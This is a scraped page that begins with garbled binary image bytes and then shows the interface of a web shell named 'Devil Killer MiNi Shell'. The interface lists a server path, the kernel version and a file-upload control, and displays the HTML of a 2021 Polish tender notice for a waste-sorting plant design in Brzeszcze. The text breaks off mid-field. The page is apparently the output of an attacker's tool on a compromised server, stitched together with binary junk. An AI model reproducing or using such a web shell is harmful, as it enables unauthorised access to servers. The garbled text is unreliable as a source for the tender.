JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210601/0007124501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00071245 z dnia 2021-06-01</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej wraz z uzyskaniem ostatecznego pozwolenia na<br/>budowę dla zadania: „Budowa sortowni odpadów na terenie ZGO w Brzeszczach przy ul.<br/>Granicznej 48” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">AGENCJA KOMUNALNA SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272203933</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościelna 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brzeszcze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-620</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ak@akbrzeszcze.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.akbrzeszcze.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej wraz z uzyskaniem ostatecznego pozwolenia na<br/>budowę dla zadania: „Budowa sortowni odpadów na terenie ZGO w Brzeszczach przy ul.<br/>Granicznej 48” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f68a500f-c24a-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00071245</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.akbrzeszcze.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest<br/>w formie elektronicznej za pośrednictwem miniPortalu, adres strony<br/>internetowej:https://www.miniportal.uzp.pl/. W postępowaniu o udzielenie zamówienia komunikacja<br/>między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod<br/>adresem:https://www.miniportal.uzp.gov.pl/, poczty elektronicznej ak@akbrzeszcze.pl, oraz ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych<br/>kopiidokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP).Wykonawca przystępując do niniejszego postępowania<br/>oudzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w<br/>Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień<br/>tego regulaminu. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. Za datę<br/>przekazaniaoferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji, przekazywanych w<br/>postępowaniu, przyjmuje się datę ich przekazania na ePUAP. Zamawiający podał w informacjach<br/>ogólnych niniejszej SWZ ID postępowania. Dane postępowanie można wyszukać również na Liście<br/>wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony<br/>głównej z zakładki Postępowania na miniPortalu.Sposób sporządzenia dokumentów elektronicznych<br/>musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobusporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).Sposób komunikowania się Zamawiającego z Wykonawcami (z wyłączeniem oferty i załączników do oferty): za pomocą poczty elektronicznej<br/>Zamawiającego wskazany powyżej w informacjach ogólnych oraz pocztyelektronicznej Wykonawcy<br/>wskazanej w formularzu oferty. Sposób sporządzania i przekazywania informacji określają<br/>rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. (Dz.U. z 2020 r., poz. 2452) w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznychdla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz rozporządzenie Ministra Rozwoju, pracy i technologii z<br/>dnia 23 grudnia 2020 r. (Dz.U. z 2020 r., poz. 2415) w sprawie podmiotowych środków<br/>dowodowychoraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia<br/>oraz informacje za pośrednictwem środków komunikacji elektronicznej, każda ze stron na żądanie<br/>drugiej strony niezwłocznie potwierdza fakt ich otrzymania. Zamawiający sugeruje, aby<br/>korespondencja dotycząca niniejszego postępowania o udzielenie zamówienia publicznego oznaczone<br/>były nazwą oraz znakiem postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający, zgodnie z art.13 oraz art. 14 Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE, Dziennik Urzędowy UE, L 119/1 z 4.05.2016, informuje,<br/>że: Administratorem Państwa danych osobowych (dalej: „Administrator") jest Agencja Komunalna Sp. z<br/>o.o., ul. Kościelna 7, 32-620 Brzeszcze, tel.: (032) 211 12 47, e-mail: ak@akbrzeszcze.pl. Administrator<br/>wyznaczył Inspektora Ochrony Danych nadzorującego prawidłowość przetwarzania danych<br/>osobowych, z którym można skontaktować się za pośrednictwem adresu e-mail: rodo@akbrzeszcze.pl.<br/>Państwa dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego oraz w przypadku wyboru<br/>Pana oferty w celu realizacji warunków zawieranych umów; wykonania ciążących na Administratorze<br/>danych obowiązków prawnych; dochodzenia ewentualnych roszczeń z tytułu niewykonania lub<br/>nienależytego wykonania zawartej umowy. Podstawą prawną ich przetwarzania są: art. 6 ust.1 lit.b<br/>ogólnego rozp o ochronie danych osobowych (przetwarzanie jest niezbędne do wykonania umowy,<br/>której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane<br/>dotyczą, przed zawarciem umowy), art. 6 ust. 1 lit. c (przetwarzanie jest niezbędne do wypełnienia<br/>obowiązku prawnego ciążącego na administratorze) oraz ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych, dalej „ustawa Pzp”. Dane osobowe pozyskane w związku z postępowaniem o<br/>udzielenie zamówienia i będą przetwarzane przez Zamawiającego wyłącznie w celu złożenia w/w<br/>oferty cenowej, w tym ewentualnego wykonania umowy, realizacji obowiązków i praw (w tym roszczeń)<br/>wiążących się z zawartą umową oraz w celu realizacji obowiązków wynikających z przepisów<br/>prawa.Obowiązek podania osobowych jest wymogiem ustawowym określonym w przepisach uPZP,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych mogą uniemożliwić wzięcie udziału w postępowaniu.Posiadacie<br/>Państwo: prawo dostępu do swoich danych oraz otrzymania ich kopii; prawo do sprostowania<br/>(poprawiania) swoich danych;prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie<br/>danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach<br/>sprawowania władzy publicznej;prawo do ograniczenia przetwarzania danych, przy czym przepisy<br/>odrębne mogą wyłączyć możliwość skorzystania z tego praw;prawo do wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy.Dane nie będą<br/>przetwarzane w sposób zautomatyzowany w tym również profilowane.Zamawiający przypomina<br/>ociążącym na Wykonawcy dopełnieniu obowiązków informacyjnych wynikających z art.13 i art.14<br/>RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z<br/>prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego<br/>udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w<br/>art. 14 ust. 5 RODO. Pozostałe kwestie wskazane są w rozdziale 1. SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">03/ZP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej<br/>wraz z uzyskaniem ostatecznego pozwolenia na budowę dla zadania: „Budowa sortowni<br/>odpadów na terenie ZGO w Brzeszczach przy ul. Granicznej 48”<br/>II.1. W zakresie rzeczowym przedmiotu zamówienia wyodrębnia się:<br/>1. Opracowanie koncepcji zagospodarowania terenu z uwzględnieniem uzbrojenia oraz<br/>wysokościowe nawiązanie się do istniejącej i projektowanej jezdni wraz z propozycją<br/>zastosowanych rozwiązań konstrukcyjno - materiałowych (przekroje podłużne i poprzeczne).<br/>2. Pozyskanie wypisów z ewidencji gruntów lub Ksiąg Wieczystych w niezbędnym zakresie.<br/>3. Uzyskanie zgód właścicieli działek na wejście w teren nieruchomości. Wymaganą formą<br/>zgody właściciela/i działki jest umowa na dysponowanie nieruchomością na cele budowlane<br/>wraz czytelną mapką opatrzoną podpisem właściciela i określającą sposób i przedmiot zajętości<br/>terenu<br/>4. Uzyskanie decyzji na wycinkę drzew - jeśli będzie wymagana.<br/>5. Projekt budowlany – wielobranżowy w zakresie projektu zagospodarowania terenu jak i<br/>projektu architektoniczno – budowlanego wraz z warunkami ochrony p. poż. jak i uzgodnieniami:<br/>p. poż., higieniczno - sanitarnymi oraz dokumentami formalnymi, opracowany w oparciu o<br/>zatwierdzoną koncepcję, wytyczne projektowe Zamawiającego i obowiązujące przepisy w<br/>zakresie gospodarowania odpadami, w tym Rozporządzenia dotyczące sposobu<br/>magazynowania odpadów.<br/>6. Opracowanie projektów przebudowy urządzeń infrastruktury technicznej niezwiązanych, a<br/>kolidujących z inwestycją, jeżeli takowe wystąpią.<br/>7. Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia.<br/>8. Przygotowanie niezbędnych wniosków i uzyskanie warunków technicznych przyłączenia do<br/>sieci: wodnej, kanalizacyjnej, energetycznej na podstawie bilansów mediów,<br/>9. Opracowanie projektu wykonawczego – wielobranżowego w zakresie projektu<br/>zagospodarowania terenu jak i projektu architektoniczno – budowlanego, opracowanego w<br/>oparciu o zatwierdzony projekt budowlany oraz wytyczne projektowe Zamawiającego,<br/>zawierający niezbędne projekty takie jak:<br/>) linii kablowych energetycznych,<br/>b) przyłącza wodnego i rurociągów wewnętrznych,<br/>c) kanalizacji deszczowej oraz sanitarnej,<br/>d) architektura (rzuty, przekroje, elewacje),<br/>e) konstrukcja,<br/>f) instalacje sanitarne (socjalne i technologiczne), wod. – kan.,<br/>g) instalacje CO wraz z ewentualnym węzłem cieplnym,<br/>h) instalacje hydrantowe (wew., zew.) oraz inne wymagane przepisami prawa instalacje ppoż.,<br/>i) Instalacje wentylacyjne – socjalne, ogólne oraz wentylacja mechaniczna hal zgodna z DOUŚ z<br/>możliwością późniejszego podpięcia wentylacji technologicznej (odciągi i odpylanie konkretnych<br/>punktów – urządzeń),<br/>j) System Sygnalizacji Pożaru (SSP) wraz z oddymianiem,<br/>k) scenariusz rozwoju zdarzeń w czasie pożaru,<br/>l) zaprojektowanie pompowni na potrzeby stacjonarnej turbiny przeciwpożarowej z zapewnieniem<br/>ciśnienia min 12 bar i max 16 bar zapewniając przepływ wody 100 – 3,600 l/mm (w optymalnych<br/>warunkach),<br/>m) instalacje elektryczne, niskoprądowe, monitoringu (CCTV),<br/>n) oświetlenie robocze oraz awaryjne,<br/>o) instalacje sprężonego powietrza,<br/>p) zagospodarowanie terenu (drogi, chodniki, parkingi) z uwzględnieniem uzbrojenia oraz<br/>wysokościowe nawiązanie się do istniejącej i projektowanej jezdni,<br/>q) przyłączy mediów,<br/>r) docelowej organizacji ruchu.<br/>10. Opracowanie przedmiarów i kosztorysów inwestorskich (zawierających tabele elementów<br/>scalonych) niezbędnych do udzielenia przez Zamawiającego zamówienia na realizację robót<br/>budowlanych.<br/>11. Specyfikacje techniczne (ogólne i szczegółowe) wykonania i odbioru robót budowlanych<br/>objętych przedmiotem zamówienia,<br/>12. Wykaz materiałów ze szczególnym uwzględnieniem ich parametrów technicznych,<br/>13. Wskazane powyżej ilości egzemplarzy dokumentacji nie uwzględniają egzemplarzy, które<br/>pozostają w instytucjach uzgadniających, czy też wydających decyzje.<br/>14. Uzyskanie ostatecznego pozwolenia na budowę<br/>15. Egzemplarze wymienionych powyżej opracowań należy dostarczyć w opisanych<br/>segregatorach. Kompletna dokumentacja musi zawierać również płytę CD zawierającą całość<br/>opracowań w formie cyfrowej – wersja nieedytowalna w PDF oraz edytowalna (DOC, DWG,<br/>KST, DXF, ODT).<br/>16. Kompletna dokumentacja tworzona przez Wykonawcę wraz z pozostałymi dokumentami<br/>typu: decyzje, postanowienia, wypisy, uzgodnienia, warunki techniczne w formacie pdf (ilość<br/>plików pdf musi odpowiadać ilości elementów, z których składa się dokumentacja techniczna<br/>np.: projekt budowlany, przedmiar robót, kosztorys inwestorski, SST).<br/>17. Do dokumentacji należy załączyć oświadczenie o jej kompletności z punktu widzenia celu<br/>któremu ma służyć, zgodności z umową oraz aktualnie obowiązującymi przepisami i normami.<br/>18. Projekt należy wykonać wraz z wszelkimi niezbędnymi opiniami, decyzjami,<br/>zaświadczeniami, uzgodnieniami oraz pozwoleniami w tym decyzją pozwolenia na budowę.<br/>Ponadto dokumentację należy sporządzić w sposób umożliwiający realizację prac dla<br/>wszystkich branż w zakresie niezbędnym do prawidłowej realizacji przedmiotowego zadania.<br/>19. Kompletna dokumentacja projektowo - kosztorysowa (z punktu widzenia celu, któremu ma<br/>służyć) winna być wykonana w zakresie pozwalającym na:<br/>1) opisanie przedmiotu zamówienia zgodnie z ustawą Pzp i przeprowadzenie procedury<br/>postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych objętych<br/>dokumentacją (zgodnie z obowiązkiem wynikającym z art. 42 ustawy Pzp dokumentacja będzie<br/>udostępniona jako załącznik do SWZ),<br/>2) wykonanie robót i ich odbiór.<br/>20. Opracowanie operatu wodnoprawnego na zrzut ścieków przemysłowych do kanalizacji sanitarnej<br/>21. Pełnienie nadzoru autorskiego na etapie realizacji robót budowlanych.<br/>22. Ponoszenie wszelkich opłat za ew. decyzje, uzgodnienia, wypisy, wyrysy.<br/>II.2. Przedmiot zamówienia określony w pkt II.1. obejmuje ponadto:<br/>1. Uzyskanie warunków technicznych oraz dokonanie uzgodnień niezbędnych do prawidłowego<br/>opracowania dokumentacji projektowej,<br/>2. Obowiązkowe zapewnienie sprawdzenia projektu budowlanego pod względem zgodności<br/>z przepisami, w tym techniczno - budowlanymi przez osobę posiadającą uprawnienia budowlane<br/>do projektowania bez ograniczeń w odpowiedniej specjalności lub przez rzeczoznawcę<br/>budowlanego,<br/>3. Przekazywanie Zamawiającemu na bieżąco kserokopii wszelkich uzyskanych decyzji,<br/>warunków, uzgodnień i opinii, w terminach umożliwiających ewentualne skorzystanie z trybu<br/>odwoławczego (oryginały uzgodnień Wykonawca zobowiązany jest przekazać Zamawiającemu<br/>wraz z przekazywaną kompletną dokumentacją),<br/>4. Dokonywanie uzupełnień lub wyjaśnień szczegółowych dotyczących opracowanej<br/>dokumentacji na każde żądanie Zamawiającego lub Wykonawcy realizującego roboty na<br/>podstawie opracowanej dokumentacji bez dodatkowych roszczeń finansowych,<br/>5. Wykonanie jednokrotnej aktualizacji kosztorysu inwestorskiego na etapie udzielenia<br/>zamówienia publicznego na wykonanie robót budowlanych.<br/>6. W przypadku, gdy na odcinku objętym przedmiotem zamówienia znajdują się urządzenia<br/>infrastruktury technicznej niezwiązane z inwestycją oraz gdy zajdzie konieczność ich<br/>przeprojektowania Wykonawca zobligowany jest zapewnić obsługę odpowiedniego projektanta<br/>branżowego.<br/>7. Zamawiający na każdym etapie sporządzania dokumentacji może wnieść uwagi do<br/>przedłożonych przez Wykonawcę rozwiązań. Wprowadzenie zmian nie może być podstawą do<br/>roszczeń Wykonawcy o dodatkowe wynagrodzenie, z wyjątkiem sytuacji gdy Zamawiający<br/>wprowadzi zmiany po ostatecznym uzgodnieniu rozwiązań projektowych.<br/>8. Dokumentacja projektowa w swojej treści nie może określać technologii robót, materiałów,<br/>maszyn i urządzeń w sposób utrudniający uczciwą konkurencję.<br/>Wykonawca jest zobowiązany w wykonywanej dokumentacji projektowej do opisania rozwiązań<br/>technologicznych, zastosowanych materiałów, wyrobów i urządzeń w sposób jednoznaczny za<br/>pomocą dostatecznie dokładnych i zrozumiałych określeń. W dokumentacji projektowej nie<br/>mogą być wskazane nazwy własne, znaki towarowe, patenty lub pochodzenie oraz<br/>sformułowania, które mogłyby utrudniać uczciwą konkurencję. W przypadku, gdy jest to<br/>uzasadnione specyfiką zamówienia i brakiem możliwości precyzyjnego określenia rozwiązań<br/>technologicznych oraz materiałów za pomocą dostatecznie dokładnych określeń, Wykonawca<br/>może zastosować określenia wskazane w zdaniu poprzednim, pod warunkiem bezwzględnego<br/>zamieszczenia zapisu „lub równoważny”, wskazując jednocześnie na minimalne wymagania<br/>techniczne materiałów lub technologii równoważnych. W przypadku użycia nazw własnych,<br/>znaków towarowych, patentów lub pochodzenia oraz sformułowań, które mogłoby utrudniać<br/>uczciwą konkurencję, Wykonawca powinien przedłożyć pisemne uzasadnienie ich użycia.<br/>9. Wykonawca, na etapie procedury wyłonienia wykonawcy robót budowlanych, bez żadnych<br/>dodatkowych roszczeń zobowiązuje się, na wniosek Zamawiającego, do udziału w<br/>przygotowaniu wyjaśnień do opracowanej dokumentacji w terminie do 3 dni od przekazania<br/>przez Zamawiającego zapytania.<br/>W przypadku, gdy odpowiedź na zapytanie powodować będzie konieczność wprowadzenia<br/>zmian do dokumentacji projektowej, Wykonawca wprowadzi te zmiany w terminie nie<br/>przekraczającym 5 dni roboczych, uwzględniając je w kosztorysie inwestorskim oraz<br/>przedmiarach robót (również w wersji elektronicznej).<br/>10. Wykonawca na każdym etapie prac jest zobowiązany do ścisłej współpracy z projektantem<br/>technologii sortowania i do uwzględniania jego uwag oraz uwag Zamawiającego.<br/>11. Uwaga: na działkach sąsiadujących z działką inwestycyjną, należących do Inwestora<br/>znajdują się:<br/>- wewnętrzny Transformator 640 kW, - punkt zrzutu ścieków przemysłowych do kanalizacji sanitarnej<br/>- przyłącze wody. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 